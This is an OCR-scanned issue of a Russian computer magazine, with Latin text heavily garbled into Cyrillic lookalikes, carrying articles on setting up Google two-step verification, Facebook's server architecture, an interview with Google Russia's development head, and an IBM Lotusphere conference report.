Глагол «КіпсІІе» переводится с английского языка как «вдохновлять». 
Атагоп предлагает достойнейшее устройство для покупки и чтения 
книг в электронном формате, которое не нуждается в дополнительной 
работе напильником. Все изначально работает очень хорошо. Но гиб- 
кая архитектура девайса не могла не вдохновить многих энтузиастов 
на создание своих собственных «доделок». В результате мы получаем 
продуманный и расширяемый девайс, который продается по доступ- 
ной цене. Вот всегда бы так. т 
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ДВУХСТУПЕНЧАТАЯ 
ШОРИЗАЦИЯ 

отеоовіі 



>ЙУЙ 

На дискеты найдешь 
видеодемонстрацию 
двухступенчатой 
системы авторизации 



Защищаем доступ к боодіе/бшаіі-аккаунту 
с помощью новой технологии 



о То, что давно используется в платежных системах и онлайн- 
банкингах для управления счетами, где необходим максимальный 
уровень безопасности, наконец появляется и в обычных онлайн- 
сервисах. С недавнего времени боодіе предоставляет возможность 
использовать двухступенчатый способ авторизации. 



Дождались! Одно из недавних и самых заметных нововведений 
Ооодіе-всяких сервисов — новая двухступенчатая авторизация. 
По сути, она добавляет новый слой защиты для твоего аккаунта 
Ооодіе, требуя во время входа в систему не только знать привыч- 
ные логин и пароль, но еще иметь доступ к твоему телефону. Это 
значит, что если кто-то украдет или подберет пароль, то облома- 
ется во время авторизации из-за отсутствия специального кода, 
который можно получить только с помощью твоего телефона. 
Поэтому, если ты используешь Отаіі в качестве своего основного 
почтового ящика (а именно так и делает большинство из команды 
«Хакера»), то мы настоятельно советуем подключить эту новую 
опцию. 



^хс^пенчатая авторизация 



Пароль — это единственное, что отделяет данные в твоем 
почтовом ящике от злоумышленника. Каким бы сложным ни 
был пароль, пускай даже сгенерированный случайным образом, 
он легко может оказаться в чужих руках и беспроблемно быть 
использован для входа в систему. Двухступенчатая авториза- 
ция — тот самый подход, который делает вход в систему намного 
более защищенным. 

В этом случае одного только пароля недостаточно. Для входа тре- 
буется два независимых элемента: 



• собственно, пароль; 

одноразовый код, который нельзя использовать повторно. 

Этот принцип давно взят на вооружение для проведения финан- 
совых транзакций через онлайн-банкинг, где нужна максимальная 
безопасность. Правда, одноразовые коды (так называемые ТАІЧ’ы) 
выдаются в отделении банка на специальной карточке. В случае 
же двухступенчатой авторизации Ооодіе, код выдается пользова- 
телю через телефон. Есть три способа получить одноразовый пасс: 

• через специальное мобильное приложение Ооодіе Аиібепіісаіог, 
которое сейчас доступно для устройств АпбгоісІ, ІРЬопе и 
ВІаскЬеггу; 

• в бесплатном 8М8-сообщении, которое при запросе отправит 
Ооодіе; 

• через голосового робота (для пользователей с городским теле- 
фоном, где нет 5М8). 

Самое главное, что нужно понять: одного логина и пароля для 
входа в систему в случае двухступенчатой авторизации недоста- 
точно. Для каждой авторизации будет необходим одноразовый 
код. И здесь надо иметь в виду, что если под рукой не окажется 
телефона (и, соответственно, возможности запросить код), то 
выполнить вход в систему будет затруднительно. Единственный 
выход из этого положения — набор специальных запасных клю- 
чей, который Ооодіе предлагает распечатать и положить в коше- 
лек. Других вариантов нет! 
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Соодіе Аккаунты 

Ввод кода подтверждений 
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Сгенерированный одноразовый код 



Как включить? 

Кнопка для включения двухступенчатой авторизации находится 
в настройках твоего аккаунта Ѳоодіе ( доодіе.сот/ассоипіз ). В 
группе настроек «Регзопаі ЗеШпдз» и подразделе «Зесигііу» 
есть ссылка «ІІзіпд 2-зІер ѵегібсаііоп», которая переадресует 
тебя на мастера по настройке двухступенчатой авторизации. 
Процесс начинается с выбора телефона. 

Если у тебя одно из устройств, на которое можно установить про- 
грамму Ѳоодіе Аиібепіісаіог (оно доступно для іРЬопе, Апбгоіб 
и В ІаскЬеггу] , то мастер попросит установить его на телефон. 
Позже его нужно будет настроить, прописав в мобильном прило- 
жении параметры своей учетной записи Ѳоодіе, и ввести зесгеі 
кеу с экрана монитора. Все настройки программа сделает авто- 
матически, если ты сосканируешь с экрана сгенерированный 
мастером ѲР-код. Пока Ѳоодіе разрабатывает версии Ѳоодіе 
Аиібепіісаіог для других платформ, получать одноразовые коды 
можно на любой телефон с помощью 5М5-сообщений. Настроить 
такую доставку одноразовых кодов необходимо в любом случае. 
Для этого на телефон придет специальный пароль, который 
нужно будет ввести в поле для подтверждения номера телефона. 
Помимо этого мастер предложит создать запасные (так называе- 
мые Ьаскир) коды на крайний случай, когда доступа к паролям 
не будет. Ѳоодіе сгенерирует что-то вроде визитки, которую 
можно распечатать и положить к себе в кошелек. Тут надо пони- 
мать, что даже если «шпаргалка» потеряется и попадет к кому-то 
в руки, он ничего не сможет с ней сделать, не зная логина и 
пароля для доступа к аккаунту. Никакого риска нет. Рекомендую 
сразу настроить все способы получения одноразовых паролей: 
установить и настроить мобильное приложение (если это воз- 
можно), прописать номер мобильного телефона для приема 5М5 
и распечатать запасные коды (к моменту сдачи материала у меня 
возникла реальная ситуация воспользоваться ими). 

Как использовать? 

Итак, как теперь будет выглядеть процесс входа в систему? По 
сути, все то же самое, за исключением одного пункта. 

1 Ты заходишь на страницу с формой для авторизации в сервисах 
Ѳоодіе (например, Ѳппаіі). 

2 . Вводишь логин и пароль, как это делал ранее. 

3. И вот здесь появляется новый этап. Ѳоодіе запрашивает код 
верификации. Открываем Ѳоодіе Аиібепіісаіог и вводим отобража- 
ющийся там код для входа в систему. Точно так же этот код можно 
получить по ѲМ5 или взять из распечатанной «шпаргалки» 



4 Опция «РететЬег ѵегібсаііоп Тэг 1Ыз сотриіег к>г 30 сіауз» 
позволяет вводить код авторизации один раз в 30 дней. 

5. Все, мы внутри и пользуемся сервисами Ѳоодіе, как и раньше. 
Как видишь, процесс входа в систему практически не изменил- 
ся. Внимательный читатель, возможно, заметит: «Ну, хорошо, с 
веб-интерфейсом все понятно, а как указывать такие пароли в 
почтовом клиенте, которые забирает почту по РОРЗ/ІМАР7». И 
будет прав. 

Вскоре после включения новой схемы авторизации перестанут 
работать все приложения. Традиционный процесс общения с 
сервером в тех же самых десктопных клиентах для работы с 
почтой жестко зашит в код программы, а поддержки двухступен- 
чатой схемы я пока еще нигде не видел. 

Чтобы обойти это ограничение, Ѳоодіе предлагает особую схему 
авторизации для этих приложений. Для каждого такого при- 
ложения (будь это десктопный почтовый клиент, мобильное 
приложение на телефоне или что-либо еще) генерируется уни- 
кальный пароль приложения (это называется Арріісаііоп-зресібс 
раззѵѵогсіз). То есть мы используем прежний логин, но вместо 
привычного пароля используем специально сформированный 
для этого приложения пасс. 

Заходим в настройки безопасности на страницу доодіе.сот/ 
ассоипІз/Ь/О/ІззиебАиІбЗиЬТокепз (либо через страницу аккаунта 
-> Зесигііу Аиібогігіпд арріісаііопз & зііез). Здесь ты увидишь 
список веб-приложений, которые используют авторизацию через 
Ѳоодіе с помощью технологии ОаиіЬ. А ниже находится секция 
«Арріісаііоп-зресібс раззѵѵогсіз». Для создания нового пасса дела- 
ем следующее: 

1. Вводим название девайса или приложения, для которого ты 
хочешь сгенерировать временный пароль. 

2 . Нажимаем «Ѳепегаіе раззѵѵогсі». 

3. Ѳоодіе возвращает 16-значный пароль, который ты теперь 
можешь указать в настройках этого конкретного устройства/при- 
ложения. 

4 . Приложение вновь работает. 

Такую операцию, в частности, я сделал для своего почтового кли- 
ента на мобильном телефоне, которым пользуюсь постоянно. 

В отличие от кода верификации, который необходимо вводить во 
время каждой авторизации, пароли приложения можно указать в 
настройках программ один раз. Но в любой момент любой из них 
можно аннулировать (сделать геѵоке) с этой же самой страницы. 
Именно так я, кстати, сделал для пасса, который зафиксирован на 
скриншоте. Руки прочь от моего аккаунта! :) т 
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АРХИТЕКТУРА 

РАСЕВООК 

500 миллионов пользователей - это не предел 

© Фильм «Социальная сеть» хорошо иллюстрирует феномен разви- 
тия РасеЬоок'а, сумевшего за рекордный срок собрать баснословную, 
немыслимую ранее аудиторию. Однако за кадром осталась еще одна 
составляющая проекта - то, как он работает изнутри. Его техниче- 
ское устройство. 



Что такое РасеЬоок сейчас? Лучше всего это демонстрируют 
сухие цифры: 

500 000 000 активных пользователей (месячная аудитория); 
200 000 000 000 просмотров страниц в месяц; 

150 000 000 обращений к кэшу в секунду; 

2 000 000 000 000 объе кто в в кэше; 



20 000 000 000 фотографий в 4-х разрешениях. Их хватило 
бы, чтобы покрыть поверхность земли в 10 слоев — это больше, 
чем на всех других фоторесурсах вместе взятых; 
более 1 000 000 000 сообщений в чате каждый день; 
более 100 000 000 поисковых запросов ежедневно; 
более 400 000 разработчиков сторонних приложений; 
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Молодой создатель РасеЬоок'а — 
Марк Цукерберг 
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Более подробно про 
архитектуру РасеЬоок 
и других высокона- 
груженных проектов 
можно почитать в 
блогеавтора: іпзідЫ:- 
іі.ги/ЬідЫоасІ 



Культура разработки РасеЬоок 



• Двигаться быстро и не бояться ломать некоторые вещи; 

• большое влияние маленьких команд; 

• быть откровенным и инновационным; 

• возвращать инновации в орепзоигсе-сообщество. 

около 500 разработчиков и системных администраторов в 
штате; 

более 1 000 000 активных пользователей на одного инженера; 

десятки тысяч серверов, десятки гигабит трафика. 

Как же все это работает? 

Масштабируемость, 
простота, открытость 

Можно по-разному относиться к социальным сетям вообще и к 
РасеЬоок’у в частности, но с точки зрения технологичности это 
один из самых интересных проектов. Особенно приятно, что 
разработчики никогда не отказывались делиться опытом созда- 
ния ресурса, выдерживающего подобные нагрузки. 

В этом есть большая практическая польза. Ведь в основе 
системы лежат общедоступные компоненты, которые можешь 
использовать ты, могу использовать я — они доступны каждому. 
Более того, многие из тех технологий, которые разрабатывались 
внутри РасеЬоок’а, сейчас опубликованы с открытыми исходни- 
ками. 

И использовать их, опять же, может абсолютно любой желаю- 
щий. 

Разработчики социальной сети по возможности использовали 
лишь открытые технологии и философию ІІпіх: каждый компо- 
нент системы должен быть максимально простым и произво- 
дительным, при всем этом, решение задач достигается путем 
их комбинирования. Все усилия инженеров направлены на 
масштабируемость, минимизацию количества точек отказа и, 
что самое важное, простоту. Чтобы не быть голословным, укажу 
основные технологии, которые сейчас используются внутри 
РасеЬоок: 

• Операционная система - І_іпих; 

• основной язык программирования - РНР + надстройка; 

• агрессивное кэширование объектов - шешсасЬесІ; 

• хранилище данных в виде пар «ключ-значение» - Му5(2І_; 

• универсальная система сбора и агрегации данных с 
рабочих серверов - БспіЬе. 

Балансировщик нагрузки выбирает рЬр-сервер для обработки 
каждого запроса, где НТМ Б генерируется на основе различных 
источников (таких как МуЗОБ, теппсасЬесІ) и специализирован- 



Что обычно проис- 
ходит за 20 минут 
на РасеЬоок? 



• Люди публикуют 1 000 000 ССЫЛОК; 

• Отмечают друзей на 1 323 000 фото- 
графий; 

• Приглашают 1 484 000 знакомых на 
мероприятия; 

• Отправляют 1 587 000 сообщений на 
стену; 

• Пишут 1 851 000 новых статусов; 

• 2 000 000 пар людей становятся дру- 
зьями; 

• Загружается 2 700 000 фотографий; 

• Появляется 10 200 000 комментариев; 

• Отправляется 4 632 000 личных сооб- 
щений. 



ных сервисов. Таким образом, архитектура РасеЬоок имеет тра- 
диционный трехуровневый вид: 

• веб-приложение; 

• распределенный индекс; 

• постоянное хранилище. 

Полагаю, что наиболее интересно будет услышать, как в проекте 
удалось использовать самые привычные технологии. И тут дей- 
ствительно есть немало нюансов. 

Проект на РНР 

Напрашивается вопрос: почему именно РНР? Во многом — про- 
сто «исторически сложилось». Он хорошо подходит для веб- 
разработки, легок в изучении и работе, для программистов 
доступен огромный ассортимент библиотек. К тому же существу- 
ет огромное международное сообщество. Из негативных сторон 
можно назвать высокий расход оперативной памяти и вычисли- 
тельных ресурсов. Когда объем кода стал слишком велик, к этому 
списку добавились слабая типизация, линейный рост издержек 
при подключении дополнительных файлов, ограниченные воз- 
можности для статичного анализа и оптимизации. Все это стало 
создавать большие трудности. По этой причине в РасеЬоок была 
реализована масса доработок к РНР, в том числе оптимизация 
байт-кода, улучшения в АРС (ленивая загрузка, оптимизация 
блокировок, «подогрев» кэша) и ряд собственных расширений 
(клиент тетсасЬе, формат сериализации, логи, статистика, 
мониторинг, механизм асинхронной обработки событий). 




> СІѴСІ 



На дискеты найдешь 
презентации и видео 
с выступлениями 
инженеров РасеЬоок с 
различных конферен- 
ций. 
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Дополнительный 

инструментарий 



Для управления такой огромной системой в РасеЬоок’е были 
созданы различные дополнительные сервисы. Всего их более 
пятидесяти, приведу несколько примеров: 

5МС ( консоль управления сервисами) — централизованная кон- 
фигурация, определение, на какой физической машине работа- 
ет логический сервис; 

(Ю5 — инструмент для визуализации изменений любых стати- 
стических данных, имеющихся в системе — удобен для монито- 
ринга и оповещений; 

Оаіекеерег — разделение процессов развертывания и запуска, 
А/В-тестирования (метод, позволяющий определить, какая вер- 
сия страницы лучше уговаривает посетителей совершить то или 
иное действие). 

Особого внимания заслуживает проект НірНор — это транс- 
форматор исходного кода из РНР в оптимизированный С++. 
Принцип простой: разработчики пишут на РНР, который кон- 
вертируется в оптимизированный С++. В надстройке реали- 
зованы статический анализ кода, определение типов данных, 
генерация кода и многое другое. Также НірНор облегчает раз- 
работку расширений, существенно сокращает расходы опера- 
тивной памяти и вычислительных ресурсов. У команды из трех 
программистов ушло полтора года на разработку этой техноло- 
гии, в частности была переписана большая часть интерпрета- 
тора и многие расширения языка РНР. Сейчас коды НірНор опу- 
бликованы под орепзоигсе лицензией, пользуйся на здоровье. 

Доработки ЛЛуБСИ 

Теперь о базе данных. В отличие от большинства сайтов, Му5СН_ 
в РасеЬоок используется как простое хранилище пар «ключ- 
значение». Большое количество логических баз данных распре- 
делено по физическим серверам, но репликация используется 
только между датацентрами. Балансировка нагрузки осущест- 
вляется перераспределением баз данных по машинам. Так как 
данные распределены случайным образом, никакие операции 
типа .ЮІІМ, объединяющие данные из нескольких таблиц, в коде 
не используются. В этом есть смысл. Ведь наращивать вычис- 
лительные мощности проще на веб-серверах, чем на серверах 
баз данных. В РасеЬоок используется практически не моди- 
фицированный исходный код Му5СП_, но с собственными схе- 
мами распределения данных между серверами по глобально- 
уникальным идентификаторам и архивирования, основанного на 
частоте доступа к данным. Принцип очень эффективен, посколь- 
ку большинство запросов касаются самой свежей информации. 
Доступ к новым данным максимально оптимизирован, а старые 
записи автоматически архивируются. Также используются свои 
библиотеки для доступа к данным на основе графа, где объ- 
екты (вершины графа) могут иметь лишь ограниченный набор 
типов данных (целое число, строка ограниченной длины, текст), 
а связи (ребра графа) автоматически реплицируются, образуя 
аналог распределенных внешних ключей. 

Использование МетсасИесІ 

Как известно, ппетсасЬесІ — высокопроизводительная распре- 
деленная хэш-таблица. РасеЬоок хранит в ней «горячие» дан- 
ные из Му50І_, что существенно снижает нагрузку на уровне баз 
данных. Используется более 25 Тб (только вдумайся в цифру) 
оперативной памяти на нескольких тысячах серверов при 
среднем времени отклика менее 250 мкс. Кэшируются сериали- 
зованные структуры данных РНР, причем из-за отсутствия авто- 



Курс на орепзоигсе 



Возвращение инноваций общественности — важный аспект 
разработки в РасеЬоок. Компанией были опубликованы свои 
проекты: ТЬгіК ( іпсиЬаіог.арасЬ ігдАЬгіК ). ЗсгіЬе ( дДЬиЬ.сот/ 
іасеЬоок/зсгіЬе) . Тогпасіо РогпасІоѵѵеЬ.огд ). Са55апсІга ( саззап- 
асЬе.огд) . ѴагпізЬ (ѵагпізЬ эгд ). Ніѵе ( Ьіѵе.арасЬе. 

эгд ). хЬргсгі ( ресІ.рЬр.пеі/раскаде/хЬргоД . Помимо этого были 
сделаны доработки для РНР, Му50І_, тетсасЬесІ. 

Информация о взаимодействии РасеЬоок с орепзоигсе- 
сообществом этих и других проектов расположена на странице, 
посвященной орепзоигсе ( сІеѵеІореггТасе от/орепзоигсе ). 



Принцип работы поиска в РасеЬоок 

матического механизма проверки консистенции данных между 
тетсасЬесІ и Му5СІІ_ приходится делать это на уровне про- 
граммного кода. Основным способом использования тетсасЬе 
является множество тиШ-деІ: запросов, используемых для 
получения данных на другом конце ребер графа. 

В РасеЬоок очень активно занимаются доработкой проекта 
по вопросам производительности. Большинство из описан- 
ных ниже доработок были включены в орепзоигсе-версию 
тетсасЬесІ: порт на 64-битную архитектуру, сериализация, 
многопоточность, компрессия, доступ к тетсасЬе через ІЮР 
(уменьшает расход памяти благодаря отсутствию тысяч буфе- 
ров ТСР-соединений). В дополнение были внесены некоторые 
изменения в ядро І_іпих для оптимизации работы тетсасЬе. 
Насколько это действенно? После вышеперечисленных модифи- 
каций тетсасЬесІ способен выполнять до 250 000 операций в 
секунду по сравнению со стандартными 30 000 — 40 000 в ори- 
гинальной версии. 

Фреймворк ТНгіН 

Еще одной инновационной разработкой РасеЬоок является 
проект ТЬгіА. По сути, это механизм построения приложений 
с использованием нескольких языков программирования. 
Основная цель — предоставить технологию прозрачного взаи- 
модействия между разными технологиями программирования. 
ТЬгіА предлагает разработчикам специальный язык описания 
интерфейсов, статический генератор кода, а также поддержи- 
вает множество языков, в том числе С++, РНР, РуіЬоп, Заѵа, 

РиЬу, Егіапд, Регі, Назкеіі. Возможен выбор транспорта (сокеты, 
файлы, буферы в памяти) и стандарта сериализации (бинарный, 
350КІ). Поддерживаются различные типы серверов: неблоки- 
рующие, асинхронные, как однопоточные, так и многопоточные. 
Альтернативными технологиями являются 50АР, СОРВА, СОМ, 
Ріііаг, Ргоіосоі ВиАегз, но у всех есть свои существенные недо- 
статки, и это вынудило РасеЬоок разработать свою собственную. 
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Для разработчиков приложений РасеЬоок предлагает 
отличные мануалы 

«В РасеЬоок используется 
практически не модифици- 
рованный исходный код Му$Ш_, 
но с собственными схемами 
распределения данных между 
серверами по глобально- 
уникальным идентификаторам» 

Важное преимущество ТНгі^’а заключается в производитель- 
ности. Он очень и очень быстрый, но даже это не главный его 
плюс. С появлением ТЬгіН на разработку сетевых интерфейсов 
и протоколов уходит куда меньше времени. В РасеЬоок техно- 
логия входит в общий инструментарий, который знаком любому 
программисту. В частности благодаря этому удалось ввести чет- 
кое разделение труда: работа над высокопроизводительными 
серверами теперь ведется отдельно от работы над приложе- 
ниями. ТЬгі!!, как и многие другие разработки РасеЬоок, сейчас 
находится в открытом доступе. 

Хранение фотографий 

Закончив на этом рассказывать об используемых технологи- 
ях, хочу привести подробности решения интересной задачки 
внутри социальной сети, а именно — организации хранения 
фотографий. Многих фотографий. Громадного количества фото- 
графий. Это довольно интересная история. Сначала фотоальбо- 
мы пользователей были организованы по самому тривиальному 
сценарию: 

• при загрузке на сервер приложение принимает изображение, 
создает миниатюры в нужных разрешениях, сохраняет в N РВ ; 

• при загрузке с сервера изображения отдаются напрямую из 
ЫР5 через НИР. Такой простой подход был необходим, чтобы 
сначала проверить, что продукт востребован пользователями, и 
они действительно будут активно загружать фотографии. Новая 
фича, как известно, «поперла». Но на практике оказалось, что 
файловые системы непригодны для работы с большим количе- 




Технология РасеЬоок Соппесі позволяет использовать 
свой аккаунт в социальной сети на сторонних сервисах 

ством небольших файлов. Метаданные не помещаются в опе- 
ративную память, что приводит к дополнительным обращениям 
к дисковой подсистеме. Ограничивающим фактором является 
ввод-вывод, а не плотность хранения. Первым шагом по опти- 
мизации стало кэширование. Наболее часто используемые 
миниатюры изображений кэшировались в памяти на оригиналь- 
ных серверах для масштабируемости и производительности, а 
также распределялись по СйЫ (географически распределенной 
сетевой инфраструктуре] для уменьшения сетевых задержек. 

Это дало результат. Позже оказалось, что можно сделать еще 
лучше. Изображения стали хранить в больших бинарных файлах 
(ЫоЬ), предоставляя приложению информацию о том, в каком 
файле и с каким отступом (по сути, идентификатором) от нача- 
ла расположена каждая фотография. Такой сервис в РасеЬоок 
получил название Наузіаск и оказался в десять раз эффектив- 
нее «простого» подхода и в три раза эффективнее «оптимизи- 
рованного». Как говорится, все гениальное просто! 

Подводим итоги 

Не секрет, что стек І_АМР эффективен и пригоден для созда- 
ния самых сложных систем, но при этом далеко не идеален. 
Конечно, РНР+Му50І_+МеппсасЬе решают большинство задач, 
но далеко не все. Каждый крупный проект сталкивается с тем, 

ЧТО: 

• РНР не может хранить состояния; 

• РНР не самый производительный язык; 

• все данные находятся удаленно. 

РасеЬоок’у (да и любым другим крупным проектам) приходит- 
ся разрабатывать собственные внутренние сервисы, чтобы 
компенсировать недостатки основных технологий, перенести 
исполняемый код ближе к данным, сделать ресурсоемкие части 
кода более эффективными, реализовать преимущества, которые 
доступны только в определенных языках программирования. 
Молниеносная обработка запросов от чудовищного количества 
пользователей достигается за счет комплексного подхода к 
распределению запросов по тысячам серверов и непрерывной 
работе над устранением узких мест в системе. В компании есть 
много небольших команд с полномочиями принимать важные 
решения, что в совокупности с короткими циклами разработки 
позволяет очень быстро двигаться вперед и оперативно решать 
все проблемы. Результат проверить несложно. Открой ІасеЬоок. 
сот . ~іг 
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С006І.Е РОССИЯ 



еседа с главой московского центра разработок 
вгением Соколовым 



о В российском представительстве компании боодіе работает около 
ста человек. И в отличие от многих других западных компаний, здесь 
ведется реальная работа над продуктами поискового гиганта. С не- 
давнего времени московские ребята переехали в новый замечатель- 
ный офис, фотографиями которого пестрит весь инет. Мы никак не 
могли отказать себе в удовольствии заглянуть к ним в гости и пооб- 
щаться с Евгением Соколовым, главой московского центра разрабо- 
ток компании боодіе. И вот что он нам рассказал. 



О разрабатываемых проектах 

Есть несколько групп разработчиков, которые занимаются раз- 
ными типами проектов. В стенах московского офиса, в частности, 
ведется работа над сервисом словарей, утилитами для гипбте- 
тестирования, отдельными частями СЬготе 05, технологией Ыаііѵе 
СІіепС Последняя в будущем реализует запуск машинного (нативно- 
го) кода в различных браузерах. Причем независимо от операцион- 



ной системы и безопасно сточки зрения пользователя. Это, кстати, 
открытый проект, исходники которого всегда доступны на сайте 
сосіе.доодіе.сопп/р/паііѵесііепі . Рипбте-тестирование — это отдель- 
ная тема. В московском офисе боодіе работает Костя Серебряный, 
который создал утилиту ТЬгеасІЗа пШгег ( собе.доодіе.сот/р/сіаіа- 
гасе-іезі ). позволяющую полуавтоматически находить баіа гасез 
(состояние гонки). Такие ошибки очень сложно поймать обычными 
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Евгений Соколов 



средствами тестирования и отладки, особенно когда объем кода 
очень большой. 

О том, как попасть в Соодіе 

Если открыть зоодіе.ги/іобз . то вы увидите, что там всегда есть 
вакансии в Ѳоодіе Россия. Мы всегда рады, когда к нам приходят 
люди. Может возникнуть вопрос: а почему же открыты вакансии? 
Очень просто: подходящих специалистов, как ни странно, мало. 

Это проблема. Что требуется от кандидата? Умение решать задачи 
в масштабе большого интернета. Понимание, как правильно сег- 
ментировать, какие структуры данных использовать и так далее. 
Такого рода вопросы мы обязательно задаем на собеседовании. 
Важное требование — умение программировать. В Ооодіе широ- 
ко используются С++ и Заѵа: люди, претендующие на должность 
инженера, обычно знают один из них. Даже те, кто сейчас пишет 
на С#, как правило, начинали именно с С++. Да и на самом деле, 
если программист пишет на С#, но обладает хорошими базовыми 
знаниями, то у него все равно есть все шансы наше собеседование 
пройти. Кандидат, по сути, сдает экзамен второго курса универси- 
тета. Проверяется знание структур, алгоритмов, умение оценить их 
сложность и тому подобное. Многие ребята, работающие в Ооодіе 
Россия, пришли сразу после получения диплома: больше всего 
из МГУ, остальные — «с миру по нитке»: из МФТИ, МИФИ, других 
московских и региональных вузов (например, из Саратовского уни- 
верситета). 

О задачках на сообразительность 

В ходе интервью мы нередко задаем разного рода задачки, чтобы 
проверить ход мышления и общий уровень подготовки кандидата. 
Могу привести пару примеров: 




Неформальная обстановка в офисе боодіе Россия 



1. Представляете себе вагон пригородной электрички? А яблоко? 
Простой вопрос: сколько яблок поместится в один такой вагон? 

2 . Есть куб. Проведем перпендикулярно его главной диагонали 
плоскость. Первый вопрос (и это прелюдия): какая фигура получится 
в сечении? А теперь главный вопрос: что получится при сечении, 
если куб будет четырехмерным? 

О мотивации 

У нас достойные зарплаты и премии. При трудоустройстве сотруд- 
нику также выдаются акции, а акции Ооодіе, как известно, стоят 
дорого. Новичок сразу уезжает на обучение в Калифорнию, чтобы 
быстро вникнуть в основные аспекты деятельности компании: «Вот 
Ооодіе, вот так работает поиск, а вот так устроена реклама». Всегда 
есть много дополнительных бонусов, которые помогают сотрудникам 
быть в тонусе и не терять интерес к работе. К примеру, есть прави- 
ло: после 18 месяцев на одном проекте человек может попросить 
перевести его на другой. А если есть желание, вообще переве- 
стись в другой офис, что многие и делают. Например, в Цюрих или 
Калифорнию. На время, а может и насовсем. В Ооодіе это очень 
частая практика. Главное, чтобы человеку было интересно, и он был 
продуктивен. 

Про распорядок дня 

Предполагается, что на работу надо приходить до 12. Но, конечно, 
за этим никто не следит. Когда ты решишь свои задачи, никого не 
волнует. Кто-то приезжает в 9, кто-то — в 12, а кто-то — в 3 часа 
дня. Это еще связано с тем, что многие работают в интернацио- 
нальных командах, и у них много переговоров с Калифорнией. 
Последние обычно проходят в 7 вечера, когда в США только 8 утра. 
В целом в Ооодіе очень свободная обстановка. Поощряется ини- 
циатива. Доходит до забавных ситуаций. Например, бывало и такое, 
что наши инженеры спорили с вице-президентами компании: «Я не 
согласен, мы должны решить эту задачу по-другому!». 

Про тренды в софте 

Ооодіе считает, что приложения должны быть кроссплатформенными. 
Пользователи со временем комфортно будут работать на самых разных 
операционных системах. Для того, чтобы поддерживать этот тренд, 
надо разрабатывать приложения, которые будут работать везде. Сейчас 
большие ставки делаются на НТМІ_5 и, соответственно, веб-сервисы. 
Компания хочет быть на острие и потому полностью поддерживает все 
новые технологии НТМІ_5, участвует в разработке стандарта. 

На этот подход напрямую завязана и разрабатываемая нами ОС. 
Сбготе 08 — вообще интересное направление. По сути, это попытка 
создать совершенно новую корпоративную платформу. В чем смысл? 
Если взять какую-нибудь крупную компанию, то у любого ее сотрудника 
обязательно будет ноутбук с важными файлами. Потеря лэптопа непре- 
менно влечет к утечке важных данных. Сбготе 05 же позволяет хра- 
нить файлы централизованно. Даже если нетбук с Сбготе 05 потеря- 
ется, то утечки не произойдет (потому что файлы хранятся в облаке). Но 
получив взамен новую «машину», вы сразу увидите знакомый набор 
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Высокие потолки, много свободного места и любая техника по вкусу 




В столовой «Самобранка» всегда очень вкусно 



софта и документов. СЬготе 05 имеет еще одно важное преимущество 
— значительно меньшие требования по железу, нежели другие ОС. 

Мы активно развиваем и нашу облачную платформу Арр Епдіпедля 
разработки и развертывания приложений. Здесь есть некоторые 
сложности, над которыми работают несколько групп программистов. 
Главная задача сейчас — сделать сервис более гибким. 

О создании качественного софта 

Изменение не вносится в код, пока его не рассмотрит команда. Как 
правило, есть «владельцы» отдельных кусков кода. Так вот, любые 
изменения, которые вы хотите внести, должны посмотреть ваш коллега 
и «владелец» куска кода. Помимо этого есть определенные требова- 
ния к тому, как писать этот код, начиная с того, что он должен быть 
отформатирован определенным образом. Если вы пишете на С++, то 
все пишут в одинаковом стиле. Это необходимо для того, чтобы код 
был неотчуждаемым. Нет моего или твоего стиля — любой инженер 
должен иметь возможность открыть код и понимать, что там написано. 
Есть также некоторые декларированные правила по использованию, 
скажем, определенных паттернов на С++. К тому же, на весь код обя- 
зательно должно быть написано определенное количество тестов, 
необходим определенный уровень покрытия. Эти требования деклари- 
руются внутри компании. 




Собрание ТесН-ІаІК, где каждый сотрудник может 
поделиться опытом 



Про программирование на Со 

Сейчас идет активная работа над языком программирования бо, но 
пока он на начальных стадиях развития. Когда сам Ѳоодіе выпустит 
на нем большой проект, появится ощутимая поддержка. Но для этого 
компания должна убедиться, что Ѳо — это язык, на котором можно 
и нужно писать код. Затея здесь следующая. Есть ощущение, что у 
существующих языков имеются проблемы. С++ слишком большой, 
разветвленный и мохнатый. Два разных человека могут писать несо- 
вместимый код. Один использует одни паттерны, другой — другие, 
и в конечном счете это часто плохо стыкуется. Но, замечу, каждый 
из них хорошо знает С++. Проблема в том, что это могут быть два 
разных С++. У нас есть понимание, что разработчики менее эффек- 
тивны, чем могли бы стать, если дать им более совершенный язык 
программирования. Он должен быть достаточно выразителен и 
гибок, но без возможности написать одно и то же десятью разными 
способами. По этой причине в Оо очень мало ключевых слов. Нет, к 
примеру, кейворда ітріеплепіз (как в Заѵа] — он попросту не нужен. 
Язык Оо сейчас обкатывается — появилось большое количество 
людей, которые начали его использовать. Предстоит еще много 
работы. Тот же компилятор сейчас только один — хорошо бы появи- 
лась альтернатива. Но все впереди, □с 
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Коллективная работа глазами ІВМ 



Іо4и кпгяп віигѵ тт^сІІ «шіі 1п Ь* іп -Ігшіиснт 

ЬоТизрЬеге 

- л ооБиыпевд, 

Каждый год в Орландо компания ІВМ проводит конференцию 
І_оІизрЬеге, которая собирает тысячи участников со всего мира. 
Это своего рода представление самых последних наработок 
компании в области корпоративного софта: инструментов для 
взаимодействия сотрудников, коллективной работы, управления 
проектами, обмена мгновенными сообщениями и так далее. В 
центре внимания — платформа ІВМ І_оІиз (давшая название 
конференции) и входящие в нее приложения, в том числе І_оІиз 
ІЧоІез и І_оІиз йотто. Эти решения используются в самых раз- 
ных предприятиях, начиная с небольших, только что зародивших- 
ся стартапов и заканчивая крупнейшими международными кор- 
порациями. Можно подумать, что скучнее темы не придумаешь, 
и демонстрировать здесь по-настоящему нового нечего. Но это 
совсем не так. 

Девиз конференции в этом году: «Ѳеі Босіаі. йо Визіпезз». Слово 
« 5 о с і а I » во многом отражает главный вектор, на котором ІВМ сей- 
час сосредоточена в работе над І_оІиз’ом. Задумка в том, чтобы 
использовать феномен успеха социальных сетей при построении 
инструментов для коллективной работы внутри компании, сотруд- 
ничества с партнерами и общения с клиентами. Раз уж людям 
привычно и комфортно использовать этот способ коммуникации, 
то надо сделать его еще одним каналом профессионального 
взаимодействия. Социальная сеть, но работающая в рамках 
одного предприятия — как тебе? Это не просто идея. Подход уже 
работает благодаря многочисленным социальным функциям, 
реализованным в І_оІиз’е. Приглашенные гости І_оІизрЬеге 2011 
(а это в большинстве своем руководители международных ком- 
паний) делились опытом, как эти нововведения помогли сделать 
совместную работу эффективнее. Реальные примеры из жизни 
огромных компаний. 

Каждый компонент таких систем, как І_оІиз, всецело заточен на 
